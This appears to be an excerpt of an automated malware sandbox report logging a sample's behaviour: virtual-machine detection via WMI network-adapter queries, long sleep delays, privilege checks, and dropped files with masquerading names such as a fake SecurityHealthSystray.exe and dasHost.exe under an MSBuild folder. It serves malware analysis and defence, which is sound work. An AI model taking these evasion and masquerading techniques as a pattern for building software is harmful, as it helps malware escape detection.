Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : ASSOCIATORS OF {Win32_NetworkAdapter.DeviceID="1"} WHERE ResultClass=Win32_NetworkAdapterConfiguration
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_NetworkAdapterSetting where Element="Win32_NetworkAdapter.DeviceID=\"1\""

Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Memory allocated: 14A0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Memory allocated: 1B040000 memory reserve \| memory write watch
Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dasHost.exe	Memory allocated: 1610000 memory reserve \| memory write watch
Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dasHost.exe	Memory allocated: 1B070000 memory reserve \| memory write watch
Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dasHost.exe	Memory allocated: 13D0000 memory reserve \| memory write watch
Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dasHost.exe	Memory allocated: 1AD60000 memory reserve \| memory write watch

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dasHost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dasHost.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\SysWOW64\wscript.exe

Window found: window name: WSH-Timer

Source: C:\ProgramData\Microsoft\based.exe	Window / User API: threadDelayed 352	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2790
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2531
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2189
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2369
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2095

Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69202\_hashlib.pyd	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Windows\System32\SecurityHealthSystray.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\rVVLbyhv.log	Jump to dropped file
Source: C:\ProgramData\Microsoft\based.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17002\select.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\iaFEdjXM.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\RKFGfNRs.log	Jump to dropped file
Source: C:\ProgramData\Microsoft\based.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17002\_hashlib.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\chceADSX.log	Jump to dropped file
Source: C:\ProgramData\Microsoft\hacn.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI26762\unicodedata.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\qGmlrcYy.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\EcYAEBsU.log	Jump to dropped file
Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69202\_decimal.pyd	Jump to dropped file
Source: C:\ProgramData\Microsoft\hacn.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI26762\_lzma.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\UuxpgXjt.log	Jump to dropped file
Source: C:\ProgramData\Microsoft\based.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17002\_ssl.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\NXnICQCE.log	Jump to dropped file
Source: C:\ProgramData\Microsoft\hacn.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI26762\_hashlib.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69202\python310.dll	Jump to dropped file
Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69202\select.pyd	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\4kug0kj4\4kug0kj4.dll	Jump to dropped file
Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69202\unicodedata.pyd	Jump to dropped file
Source: C:\ProgramData\Microsoft\based.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17002\_queue.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\ovdDmGAG.log	Jump to dropped file
Source: C:\ProgramData\Microsoft\hacn.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI26762\_decimal.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\THthvKov.log	Jump to dropped file
Source: C:\ProgramData\Microsoft\hacn.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI26762\select.pyd	Jump to dropped file
Source: C:\ProgramData\Microsoft\hacn.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI26762\_bz2.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\psELHGPB.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\GQcIpPoS.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\bbeWvQkg.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\MAhhiIaK.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\IJrrbLaQ.log	Jump to dropped file
Source: C:\ProgramData\Microsoft\based.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17002\_bz2.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69202\_lzma.pyd	Jump to dropped file
Source: C:\ProgramData\Microsoft\based.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17002\_lzma.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\eeEmWDhS.log	Jump to dropped file
Source: C:\ProgramData\Microsoft\based.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17002\_ctypes.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\CjJRSFHW.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\HMPjFLLW.log	Jump to dropped file
Source: C:\ProgramData\Microsoft\based.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17002\python310.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\vCoCyIOs.log	Jump to dropped file
Source: C:\ProgramData\Microsoft\based.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17002\unicodedata.pyd	Jump to dropped file
Source: C:\ProgramData\Microsoft\based.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17002\_socket.pyd	Jump to dropped file
Source: C:\ProgramData\Microsoft\based.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17002\rar.exe	Jump to dropped file
Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69202\_bz2.pyd	Jump to dropped file
Source: C:\ProgramData\Microsoft\based.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17002\_sqlite3.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\NOQISejH.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\PbqyFjSG.log	Jump to dropped file
Source: C:\ProgramData\Microsoft\hacn.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI26762\python310.dll	Jump to dropped file
Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69202\_socket.pyd	Jump to dropped file
Source: C:\ProgramData\Microsoft\hacn.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI26762\_socket.pyd	Jump to dropped file
Source: C:\ProgramData\Microsoft\based.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17002\_decimal.pyd	Jump to dropped file
Source: C:\ProgramData\setup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\wxyubnjmnlae.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\KVBZghxI.log	Jump to dropped file

Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes	graph_0-18004
Source: C:\ProgramData\Microsoft\hacn.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\ProgramData\Microsoft\based.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes

Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	API coverage: 6.4 %
Source: C:\ProgramData\Microsoft\based.exe	API coverage: 9.7 %

Source: C:\ProgramData\Microsoft\based.exe TID: 7392	Thread sleep count: 352 > 30	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe TID: 7392	Thread sleep time: -352000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7732	Thread sleep count: 2790 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8328	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7696	Thread sleep count: 77 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1196	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8428	Thread sleep time: -11990383647911201s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7332	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7728	Thread sleep count: 2189 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8332	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6828	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7740	Thread sleep count: 2369 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8424	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7716	Thread sleep count: 80 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2676	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7248	Thread sleep count: 278 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8408	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8092	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe TID: 8440	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\cmd.exe TID: 9136	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8528	Thread sleep count: 2095 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8628	Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8588	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dasHost.exe TID: 5840	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dasHost.exe TID: 8076	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Windows\System32\systeminfo.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS

Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
